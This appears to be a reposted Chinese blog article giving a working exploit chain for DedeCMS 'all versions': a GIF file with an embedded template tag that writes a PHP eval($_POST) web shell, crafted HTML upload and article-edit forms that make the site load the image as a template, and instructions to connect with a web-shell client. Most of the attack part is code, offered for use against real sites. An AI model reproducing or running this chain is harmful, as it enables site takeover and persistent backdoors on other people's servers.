DEDEcms GET shell 再次通杀 所有版本
来源:互联网 发布:php域名在线授权系统 编辑:程序博客网 时间:2024/06/14 07:44
还是上次的那个dede getshell 漏洞 ,只不过官方的补丁没有补到位。
现在其基础上,修改图片代码实现最新版本补丁突破。
找一张图片,在保留图片代码的同时,插入如下代码
复制代码
GIF89aGIF89a {dede:name runphp='yes'}
$fp = @fopen("idea4.php", 'a');
@fwrite($fp, '<'.'?php'."/r/n/r/n".'eval($_POST[idea4])'."/r/n/r/n?".">/r/n");
@fclose($fp);
{/dede:name}
利用方法过程:
1.
复制代码
Gif89a{dede:field name='idea4' runphp='yes'}
@eval($_POST['idea4']);
{/dede:field}
把上面的代码保存为1.GIF,idea4为一句话密码
2.
复制代码
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">//我在本地环境
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
本部分内容设定了隐藏,需要回复后才能看到
3.
发表文章,然后构造修改表单如下:
复制代码
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
/*修改文章,查看源文件,搜索idhash来找 */
复制代码
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
/*如果是V5.5的,下面是调用验证码的*/
复制代码
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede//include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" onclick="this.src=this.src+'?'" />
红色部分都 是需要注意的地方,得根据实际情况进行对应修改。
修改完成后查看文章即可。
然后预览自己发布的文章,用菜刀连接之即可
做站不容易,大家拿到shell别做过分的事情!测试即可!
- DEDEcms GET shell 再次通杀 所有版本
- dedecms xss oday通杀所有版本 可getshell
- dedecms xss 0day通杀所有版本 可getshell
- [分析]-DedeCMS全版本通杀SQL注入漏洞
- [分析]-DedeCMS全版本通杀SQL注入漏洞
- Dedecms去掉所有版权
- DEDECMS拿SHELL EXP
- DEDECMS拿SHELL EXP
- DEDECMS拿SHELL EXP
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具
- DedeCMS另一处全版本通杀SQL注入(无限制)
- 风讯 4.0之前所有版本通杀拿SHELL 0day
- serv-u最新通杀所有版本0day
- serv-u最新通杀所有版本0day
- Discuz!所有版本通杀 存储型XSS 0day
- 安卓面试题,再次归纳版本
- shell 版本
- DedeCMS本地安装多个同一版本的DedeCMS系统
- grep or 条件的多种方法
- Ecshop 漏洞集合
- checkedlistbox使用办法
- netstat的10中用法
- VS2008下直接安装使用Boost库1.46.1版本
- DEDEcms GET shell 再次通杀 所有版本
- tcpdump本机抓包
- 什么是DOMINO
- N点主机管理系统密码解密代码程序
- 实验: 数据库操作封装
- PHP168 V6.01/6.02权限提升及暴本地路径漏洞
- mysqldb windows下的安装问题
- sysctl: 深入使用Linux的必经之路
- Linux下基于Java的程序乱码的解决方法